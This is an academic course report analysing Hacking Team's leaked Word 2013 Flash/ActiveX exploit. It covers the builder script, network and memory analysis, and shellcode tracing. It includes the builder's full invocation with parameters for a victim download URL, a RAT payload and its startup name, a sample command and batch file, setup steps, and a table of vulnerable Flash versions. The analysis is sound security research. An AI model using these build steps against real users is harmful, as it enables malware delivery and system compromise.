Embed Size (px)
Citation preview
U n i v e r s i t y o f T r e n t o , I t a l y F e b 2 0 , 2 0 1 6
Report submitted in Partial Fulfillment of the Course
Offensive Technologies
Università degli Studi di Trento
Master of Science in Computer Science
EIT Digital Master of Science in Security and Privacy https://securitylab.disi.unitn.it/doku.php?id=course_on_offensive_technologies
AmitGupta
HackingTeamMSWord2013exploitAnalysis
AliDavanian
Table of Contents
ThestairwaytounderstandHackingTeamWord2013exploit..................................................................3
Introduction.............................................................................................................................................3
StaticAnalysis..........................................................................................................................................3
ExploitBuilder......................................................................................................................................3
DynamicAnalysis.....................................................................................................................................9
BehavioranalysisoftheWord2013exploit........................................................................................9
ExploitTesting.......................................................................................................................................19
Requirementstobuildtheexploit.....................................................................................................19
Requirementstoruntheexploit.......................................................................................................21
Conclusion.............................................................................................................................................22
ANNEX....................................................................................................................................................22
References.................................................................................................................................................23
The stairway to understand Hacking Team Word 2013 exploit Introduction In this study,anexploitofhacking team(Team,2015)affectingMicrosoftoffice2007,2010and2013hasbeen assessed. Theexploit itself leverages the capability ofMicrosoftword to render ShockwaveFlashfilesandexploitsavulnerabilityof InternetExplorerActiveX.Weclaimthatthevulnerability isamemory corruption and the exploit overwrites the adjacent heap to run arbitrary codes downloadedfromachosenwebsource.OurreverseengineeringoftheSWFfile(shellcodecontainer)showsthattothebestofourknowledge,thisexploitisdifferentthanotheranalyzedFlashPlayerexploitsin(Pi,2015)and (Li, 2015). Unfortunately after 3 years in 2016, out of 54 Antivirus just 1 is able to detect themaliciousnessofthedocument(virustotal,2016).InotherwordsifauserreceivesamaliciousMicrosoftwordfile–liketheoneweproduced–andshehasAvira,AVG,ESET-NOD032KasperSkyetc.updatedtothelastversion,shewillnotbeabletodetectthemaliciousnessofthedocumentandsheprobablywillopen it.Furthermoreduringourcourseofexploit testingwe foundout that thisexploitcanstillworkwith2015flashversions(refertoTable1(listofvulnerableflashversionstoHTword2013exploit) forthelistofvulnerableversionswefound)andofficeWord2013,Microsoftpublishedanupdatetopatchthis vulnerability after HT dumpwent public, installed on aWindows Seven 32 bit. This vulnerabilityhowever, is patched on the last published flash player version we tested (refer to Table 1(list ofvulnerableflashversionstoHTword2013exploit)). Intherestofthisreportwefirstreviewourstaticanddynamicanalysisoftheexploitbuilderandtheshellcodesandthenwecombinethesetworesults.Finallywedescribeourtestingenvironmentsandtheconfigurationswemade.
Static AnalysisInthissectionwereviewourassessmentoftheexploitbuilder(ht-2013-002-Word\exploit.py),thebinActiveX file (ht-2013-002-Word\resources\activeX\activeX1.bin), shellcode (ht-2013-002-Word\resources\shellcode) and the final produced swf file1. Because of the coupling between theseresourcesweanalyzethemaltogether.
Exploit Builder TheHTword2013exploitcomeswithabuilder.Thebuilderisapythinscript,exploit.py,thatintegratesshellcode,payloadanddocxfileandproducesswf,datandthemaliciousdocxfile.Thefinaloutcomeofrunningthisexploitcanbeanythingdependingontheloadedpayload.TheFigure1willshowtheexploitgenerationprocess:
1Theresultsofreverseengineeringincludingshellcodeasmandswfflaarepartsofthisreport
Figure1(HTword2013exploitgenerationprocess)
Embedding ActiveX and ShockWaveFlash exploit ThisexploitembedsanActiveXbinarywhichinturnrunsashockwaveflashfile.TheshellcodeisactuallyintheshockwaveFlashfile.Todothisthebuilderscript loadsthe inputdocxfile,unpacks it,addstherequiredbinfileandthenagainpacksitsimplyusingzip.exe.ThisispossiblebecauseoftheXMLmediafilesstandardthatwordfollows.
Docx format Docxfilesareactuallyapackageofallthemediafilesthatyoumayseeinadocxfile.Ifyouunpackthefile – either by using anunpacker or changing thedocx extension to zip andunzipping it – there areseveralfilesanddirectoriesinasingledocxfile:
Figure2(docxfileunpacked)
Explainingallthefilesandtheirdetailsareoutofthescopeofthisreport,forfurtherinfoyoucanrefertoISO/IEC29500standard(Microsoft,2011)(Wikipedia),howeverhereweexplainsomerequiredpartsforouranalysis.
Injecting Shellcode The ActiveX bin file will be copied into the media folder finally but in order to load and run it byMicrosoftword the exploit builder updates the [Content_Types].xml (to load the components to runSWF)andrellinksinthe_rel/document.xml.rels:
Figure3(exploit.py)
Finally toplace theShockwave flash file in thedoc theexploitupdatesword/document.xml file – filewhichcontainsthebodyandcontentofthedocxfile–torendertheswf:
Figure4(exploit.py)
Preparing the ShockWaveFlash executable The exploit has a verywell-engineered designmeaning that the shellcode itself is separate from theexecutable. Inotherwords theshellcode file is the just the first stage to load the finalpayload (RAT).Duringthebuildingphase,theshellcodewillbeinsertedtotheswffile.Hereishow:
Figure5(exploit.pyandswffile)
Atthe1highlightedpart(Figure5)theshellcodeoffsetintheswffileisreadandthenatthesecondpartthe content of shellcode file is read. Afterwards the shellcode will be written to the swf file. Afterintegration,theswfwillbelikethiswiththehighlightedpartcontainingtheshellcode:
Figure6(Shellcodeopcode)
Thereisanotherlevelofparameterizationandthatisreadingthemalwareinstallerfromthenetwork:
Figure7(exploit.pyandshellcode)
Asyoucanseefromthe1sthighlightedpart,8bytesfromthestartoftheshellcodefileisthelocationoftheserverpayloadfile.AfterinputtingtheRATexeitcreatesadatfilewitharandomnameandheretheaddressofthatdatfilewillsit.Otherparametersare initializedaccordingly likewhatyousee in2and3(Figure7(exploit.pyandshellcode)).
FinallytheActivexbinaryfiletoexecutetheswfismodifiedsothatitreadstheswffilefromtheserver–itwillbeinsertedin3places:
Figure8(exploit.py)
Theselinesfindthe3httptextsinthebinfileandreplaceitwiththeserverswfaddress:
Figure9(thebinActiveXsnapshot)
Finallytwopackagesbyrunningthisexploitwillbeprepared,onetosendtothetargetandoneswffileandadatfilefortheserver:
Figure10(packagingtheouput,exploit.py)
Usage Toinvokethisexploitbuildertheusershouldinvokeitlikethis:
python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT%%OUTPUT_SERVER%%SCOUT_NAME%.exe
Inthefollowingsectionweexplaineachparameter:
• URL:istheurlthatwillbecalledfromthevictimtodownloadthemaliciousagent• OUTPUT:nameofthezipfiletogeneratewithmaliciousdocument• FILE:inputdocumenttomodify• FILENAME:nameofthemaliciousdocumentforthevictim• AGENT:nameorpathoftheRATorTrojantoinjecttothevictimsystem• OUTPUT_SERVER:zip filegenerated for the server [containsencryptedmalwareandmalicious
swf]• SCOUT_NAME:NameoftheRATwhenwillbeinstalledonthevictimmachine
ApracticalusageofthisexampleisreviewedinRequirementstobuildtheexploitsection.
Dynamic Analysis Behavior analysis of the Word 2013 exploit Inthissectionwemainlyreflecttheresultswegotbymanualdynamicanalysisoftheexploit(InordertolearnabouttheexploitproductionandourtestingenvironmentpleaserefertoExploitTestingSection.)Inanutshellwhentheuserclicksthedocxfilethiscourseofactionswillhappen:
• WordloadsthecomponentstorunSWFfile• WordasksinternetexplorertodownloadaSWFfile• Victimguestdownloadstheswffilefromthewebserver• WordgivescontroltoinstalledflashtorunSWFfile• TheswffileexploitsamemorycorruptionvulnerabilityofflashactiveXandplacetheshellcode
inmemory• Theshellcodestartstorun• Theshellcodewilldownloadthedatfile
• The dat file will be renamed to the HEYFINDME.exe (we provided this name for exploitbuilder)
• Itwillbeplacedinthestartup
We first started our analysis by examining the network traffic usingWireshark. Afterwards we usedmemory usage graph and Procmon to analyze the series of filesystem, registry, network and processevents.UsingthedatatakenfromProcmoninconjunctionwithourpreviousresultofstaticanalysisweusedWinDbgtodigmemory.2
Network traffic analysis of the Word 2013 exploit ToanalyzethenetworktrafficweusedWireSharkandtofindtheexploittrafficmucheasierweusedafiltertoshowtheHTTPrequestssincefromourstaticanalysisweknewthattheexploittriestoconnecttoastartinghttp://address.Thefitterwas“httpandip.dst!=239.255.255.250”whichsimplyjustshowshttptrafficsandremovesthosegoingtothemulticastaddress.Afterclickingthedocxfilewecouldspottworequestsforswfanddatfile(Figure11(HTWord2013exploittrafficanalysis)).MoreoverwecouldmatchthesetrafficstoWordprocessusingProcMonTCPoperationfilter
Figure11(HTWord2013exploittrafficanalysis)
2ProcMonandWireSharkoutputshavebeenaddedaspartofthisreport
Figure12(WordexploitTCPsendrequest)
Thefirstrequestwillbeissuedwithnon-vulnerableflashplayersonWindowsXPaswellbutthesecondwill be only issued if the exploitation is successful. Another interesting point that we found is thebehaviorofclickingthedocforthesecondtimeorincasetheswfisnotaccessible.Intheformer,thefilewillnotbedownloadedbecausetheserverreturns304statuscode.Inthelattertherequestwillbesentandtheexploitworksasexpected.
Memory Usage Oneoftheprobablecasesforthesetypesofexploitsisheapsprayingandifitishugeitiseasytospotitinthisstagesincethesystemisstillnotcompromisedandthegivendataistrustworthy(Figure13).Ouranalysisshowsthatthememorygraphdoesnotshowatleastanyobviousabnormality.
Figure13
Memory analysis after clicking word 2013 exploit UsingHEYFINDMEtextwhichweknowitwillbethenameofthepayloadfileonthevictimsystemwefoundoutseveraleventsinProcessMonitor(WindowsSysinternals,n.d.)
Figure14
Looking at the sequence of actions it is obvious that the exploit tries to create the Trojan file in thestartupfolder.Thereforeatthetimeofclickingthewordfilenomaliciousactivitywillhappenuntilthenextreboot.Byopeningtheeventwetracedthecallstothiseventandasexpectedsomecallersourcesarenotknown(InsectionHeapMemoryanalysisweanalyzetheseaddressesmore):
Figure15(stacktracesfirsttrial)
OneimportantobservationthatwehadwasthesuccessoftheexploitwithpresenceofASLR.Werantheexploit several timeswith the sameparametersbut the stack addressesweredifferent. Thenextscreenshotprovesthis:
Figure16(Addressfluctuationby32MB)
Whatwerealized is thattheexploithasaprecisemethodofgettingtheshellcodeaddressbecauseinourHeapMemoryanalysiswehaven’tfoundbigNOPsledtomaketherandomredirectionpossible.
Heap Memory analysis After finding the events in ProcMon we used WinDbg to look at the memory more closely. AfterattachingtheWinDbgtoWordProcessweexaminedtheloadedmodules’addresses(Figure17)inordertospeculateaboutthepossibilityofthesourceofsuspectedaddresses.
Figure17(wordexploitloadedmodules)
Sincethesuspectedcallerisinnoneoftheloadedmodulesweexaminedheapusing“!heap”command:
Figure18(heapallocatedmemoriesbyHackingteam’sexploitword2013)
AsyoucanseeinFigure18(heapallocatedmemoriesbyHackingteam’sexploitword2013)thecalleraddress is near the last allocated heap. This attracted our attention and we more analyzed heapallocationsusing“!heap–scommand”:
Figure19(HackingTeam'sword2013exploitheapstat)
Asyoucanseeinthestat,allofthe2lastallocatedheapchunksareusedandthen1016/1024arefreedfor0a650000thatgiveushintsabouttheheapcorruptionvulnerability.Afterthiswetriedtoanalyzedthelastheapslabmorecloselywithcommand“!heap-stat–h”:
Figure20(HTWord2013exploitmemorycorruption)
As a surprise the command returns nothing. One strong possibility is that the heap header isoverwrittenbecauseofanoverflow.
Shellcode Dump Afteranalyzingtherootcauseofthevulnerabilitywetriedtodumptheshellcodeinmemory.TodothatweusedthedatafromStaticAnalysissectionofthisstudy.Usingthebytecodeofthewin32shellcodeinthedisassembledswffile(Figure6(Shellcodeopcode))westartedtodigthememory.
Firstwetriedtomatchthefirstfewbytesoftheshellcodeusing“s-b0x00000000L?0x0a45923e81e1ff0f000003c883c14083c74083c640515756e8a0feffffc3”commandinWinDbg.Theresultreturned6matches.Wetriedtotrunktheresultsbysearchingformiddlebytes;theresultreturned5matches.Finallywetriedlastbytesandwegottwomatches:
Figure21(HTword2013exploitshellcodehuntinginmemory)
By examining the assembly codes in thematched areas and comparing these addresses to ProcMonresult(Figure17(wordexploitloadedmodules))withconfidenceweassertthat0a459100wasthestartaddress of the shellcode – for that specific analysis since because of ASLR addresses change – and0a45a36bwastheend.Usingthesetwoaddresseswedumpedtheshellcodetoafileusing“.writememc:\shellcode.dump0a4591000a45a36b”command.
NowthatwearecertainabouttheplaceandaddressesoftheshellcodeinmemorywecanmatchtheProcMoneventstotheshellcodeAssemblycode3.
Mapping dynamic info to shellcode source code AccordingtoProcMon,aseriesofeventstoquerythestartupfoldercontentscanbeseen(Figure22).0x87Ffarfromthestartaddressoftheshellcode(thisaddresscanbeusedtofindthebyteopcodeinfladisassembledfile),youcanfindaportionofcodethatisresponsibleforthis.Thisportionstartsfromline720oftheequivalentasmfile:
push 8000h push [ebp+var_8] push [ebp+var_4] mov eax,[ebp+arg_0] call dwordptr[eax+80h]
3thedumpplustheasmequivalencearepartsofthisreport
Figure22(startupqueryevents)
Bycheckingthestacktracethisportionhasbeencalledbyline1600(0xFC5fromstartoftheshellcode)thatis:
lea eax,[ebp+var_88] push eax call sub_801
This linehasalsobeen calledby the last lineof the shellcode thatproves thepreviousportion is themain flowof theshellcode.Asyoucansee inFigure22afterthisrequestswehaveTCPrequeststhatsuggestherethedownloadof.datfile(RATorTrojanasyouwish)willhappen.Thismeansthisprocesswillhappeninfollowinglinesafterreturnfrom“startupfolderquery”.
ThecalltothecreationoftheRATexefilewillhappeninline1628:
push 0 push 80h;'€' push 2 push 0 push 0 push 40000000h push [ebp+var_90] call [ebp+var_14]
Afterthat,writingtothefileandclosingitwillhappensuccessivelyinline1638and1640:
push 0 lea eax,[ebp+var_94] push eax push [ebp+var_98] push [ebp+var_8C]
push [ebp+var_9C] call [ebp+var_10] push [ebp+var_9C] call [ebp+var_74]
Finallytheshellcodewillreturninline1655:
push 1 mov eax,[ebp+arg_8] add eax,282h push eax lea eax,[ebp+var_88] push eax call sub_E6B
Exploit Testing Theexploit,asmentionedinExploitBuildersection,willbebuiltusingthedocxinputfile,serveraddressand the final Trojan (RAT) to be installed – to see the complete parameters refer to Exploit Buildersection.Inordertorunningthebuildersuccessfully,aseriesofpreconfigurationsareneeded;otherwisethebuilderfails.TheseconfigurationsareexplainedinsectionRequirementstobuildtheexploit.Ontheotherhandtoruntheexploitonthevictim,thevulnerableapplicationsshouldbeinstalled.ThiswillbereviewedinsectionRequirementstoruntheexploit.
Requirements to build the exploit Thestepsareasfollows:
1. InstallPythonversionthatsuitsyourhost(2.6or2.7for32bitversionor3.xfor64bithosts)2. Installing python easy-install by downloading ez_setup.py (Python Package Index, 2016) and
runningit3. Installpylzmalibraryby:
• Downloadingthepackage(Python,n.d.)• Exploretothecontainerfolder• Issuepython-measy_installpylzma-0.4.2-py2.6-win32.eggcommand
4. Installzip.exepackagewhichsuitsyourhost(zip,2016)5. AddthebinfolderofzippackagetoyourwindowsPATHenvironmentvariable
Ifallthestepsaresuccessfullytaken,theexploitbuilder(exploit.py)canbeinvokedusingacommandlikethis:
1. python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.218.221.117 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\wordinput\calc.exe"Payload7HEYFINDME.exe
Fortestpurposeswesuggesttouseabatfilebecausetheexploit isone-shotandafteroneusageit isuseless.Thereforeforananalysistheanalysistsmayneedmorethan10exploitsindifferenttimesandinputtingtheoptionscanbeatediousjob.Ourbatfilewaslikethis:
set"curpath=%__CD__%"
F:REM:OurexploitscriptsareindriveF.ChangethistoyourscdF:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Wordpython.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.218.221.117 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\wordinput\calc.exe"Payload7HEYFINDME.exec:REM:OurbatchfileisindriveC.Changethistoyourscd%curpath%
Afterrunningthebuilder6fileswillbeproduced(Figure23):
1. onedocxfilewhichcontainstheexploit2. oneswffilewithrandomnamethatcontainstheshellcode3. onedatfilewithrandomnamethatcontainstheTrojantobeinstalled4. onetmpfolderthatisunpackedversionofdocxfile5. onefilewithoutanyextensionwhichfurtherwillbereviewedinExploitBug6. azipfilethatcontainsswfanddatfile
Figure23
Exploit Bug The“Trial1”optionthatweprovidedintheexploitbuilderinputwillbeusedforazipfolderinwhichwillbe the docx exploit. That zip folder is 20 that does not contain the zip extension. If you provide .zipextentioninthebuilder input,thebuilderfailsbecauseinonepartofthecodetheyassumetheinputhas.zipandinanothernot.Twolinesare(314,315inexploit.py):
os.system("zip.exe-r\""+send_to_target_zip+"\"\""+output_file+"\"")shutil.move(send_to_target_zip+".zip",send_to_target_zip)#‘+".zip"’fromthefirstargumentshouldberemoved
Requirements to run the exploit There are 3 .yaml files in the ht-2013-002-Word folder that seem giving info about the exploit andvulnerable apps. During our course of analysis we found out those info to be misleading. Theymentioned flash player v11.1.102.55 as the first vulnerable version that is not true! We tested thisversionofflashplayerwithWindowssevenandXP(inconjunctionwithoffice2010and2013)andthisversion was not exploitable. The first vulnerable flash version we found was version 11.5.502.146workingbothonwindowsXP(wetriedoffice2010)andwindowsSeven(office2013)thoughweweremostly using 11.5.502.146 version for our analysis. To run the exploit successfully, one also needs toinstallawebserveranduploadtheshellcodeandthepayload.InourcaseweusedXampponawindowsoperatingsystem.TorecapourworkingenvironmentforWindowsXPx86was:
• WindowsXPx86,servicepack3• Microsoftoffice2010(tobeinstalledonXP)• FlashplayerwithactiveXversion11.5.502.146(tobeinstalledonXP)• XamppserverwiththeserverIPmentionedasparameterforexploitbuilderandhavingswfand
datfiles
AndforwindowsSeven:
• WindowsSevenultimate32bit• MicrosoftOffice2013OfficeProfessionalPlus32bit(15.0.4420.1017)• AnyflashsuccessfulversionfromtheTable1(listofvulnerableflashversionstoHTword2013
exploit)• XamppserverwiththeserverIPmentionedasparameterforexploitbuilderandhavingswfand
datfiles
11.1.102.55 Failed11.1.102.62 FailedFlashplayer11.5.502.146(withactiveXversion) SuccessfulFlashplayer11.6.602.180(withactiveXversion) SuccessfulFlashplayer12.0.0.77(withactiveXversion) Successful
Flashplayer15.0.0.167 SuccessfulFlashplayer15.0.0.167 SuccessfulFlashplayer17.0.0.134 SuccessfulFlashplayer18.0.0.324(lastpublishedversion) Failed4Flashplayer19.0.0.245 Failed4Flashplayer20.0.0.235 Failed4
Table1(listofvulnerableflashversionstoHTword2013exploit5)
Wetriedseveralflashversionstotrackthepatternofvulnerabilityinversionsanditseemsafterthefirstvulnerableversion,almostallversionswereaffecteduntiltheHTdumps.Thelastversionsarepatchedasouranalysissuggests.Wealsotriedtoruntheswffilesolelyandinfecttheguest. Inthiscaseafterswfrunning,thedatfilewillbedownloaded,thoughitwillnotbeputinstartup.
Conclusion InthisstudyweanalyzedtheHackingTeamExploitDeliveryserviceforword2013exploitbyanalyzingtheexploitbuildertheyusedtousetheproduceexploitforthecustomers.Weanalyzedtheshellcodeanditsexecutionflowusingbothstaticanddynamicanalysis.Additionallywemappedthesourcecodelines to thedynamicdata. Furthermorewe foundoutpossiblevulnerability theexploitacquiresusingour memory analysis data. Finally we reviewed the setting environment, requirements andconfigurationsforthisexploittestingfortwodifferentoperatingsystemsandapplications.
AlthoughthisvulnerabilityispatchedbothonMicrosoftandAdobeside,theantivirusescannotdetectit.Inotherwordsiftheuserusesvulnerableversionshersystemmaystillbeinfected.Thisisprobablebecausewecouldfind2015vulnerableflashplayer(FlashArchive,2015)andpeopledon’tusetoupdatethe office versions regularly. On the other hand to the best of our knowledge a detailed onlineexplanation of the exploit is not available and the root cause of the vulnerability that we claim ismemorycorruptioncanbefurtherassessed.
ANNEX Asanintegralpartofthereportweattachedthefollowingdocuments:
1. SWFdisassembledfile,seeattachments\HT_word_2013_exploit_swf.fla2. Raw Shellcode (in resource folder of the exploit) assembly, see s
attachments\hellcode_RAW.asm3. ShellcodeMemorydumpduringthecourseofanalysis,seeattachments\shellcode.dump4. Ending-A-and-0-trimmed asm equivalence of Shellcode Memory dump during the course of
analysis,seeattachments\shelldump-trimed.asm5. Screenshotsof the successful and failedexploitationwithdifferent flashplayers, attachments
\seeFlashPlayerScreenshots6. ProcMondata,seeattachments\LogfileFinal.PML7. WireSharkdata,seeattachments\Network-Trafficl.pcap8. VirusTotalAnalysisofourdocxexploitfile,seeattachments\VirusTotal-Tricky.pdf
4Seemstobepatched5Screenshotsofsuccessandfailurearepartofthisreport
References (n.d.).RetrievedfromWikipedia:https://en.wikipedia.org/wiki/Office_Open_XML
(2011). Retrieved from Microsoft: https://msdn.microsoft.com/en-us/library/office/gg607163(v=office.14).aspx
Flash Archive. (2015, 3 12). Retrieved from Acrobat Reader:https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_17.0.0.134_archive.zip
Li, B. (2015, 7 7). Hacking Team Flash Zero-Day Integrated Into Exploit Kits. Retrieved fromhttp://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-integrated-into-exploit-kits/
Pi,P.(2015,711).AnotherZero-DayVulnerabilityArisesfromHackingTeamDataLeak.Retrievedfromhttp://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/
Python Package Index. (2016, 1). Retrieved from Python:https://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&cad=rja&uact=8&ved=0ahUKEwjgtJemkrjKAhUG6Q4KHXzcCIcQFgg5MAI&url=https%3A%2F%2Fbootstrap.pypa.io%2Fez_setup.py&usg=AFQjCNFKlhYwQ1ijAxBLR_tM3_FoALDwmg&sig2=kpYEy_NJqL0W34LgFrVqew
Python.(n.d.).PythonPackageIndex.Retrievedfromhttps://pypi.python.org/pypi/pylzma/0.4.2
Team, H. (2015). Hacking Team ht-2013-002-Word exploit. Retrieved from GitHub:https://github.com/hackedteam/vector-exploit/tree/master/ht-2013-002-Word
virustotal. (2016, 1). Assessment a custom built office 2013 exploit. Retrieved fromhttps://www.virustotal.com/en/file/90e555a92c839cd28488db23846e4b0e89c4d81f84d96c6cf27a9acbfb5ebbf2/analysis/1452957999/
Windows Sysinternals. (n.d.). Retrieved from Microsoft: https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx
zip,7.(2016,1).Retrievedfromwww.info-zip.org
![Team Innovators Presents Ms Word[1] (Repaired)](https://img.pdfslide.us/doc/110x75/563db9c2550346aa9a9fa379/team-innovators-presents-ms-word1-repaired.jpg)
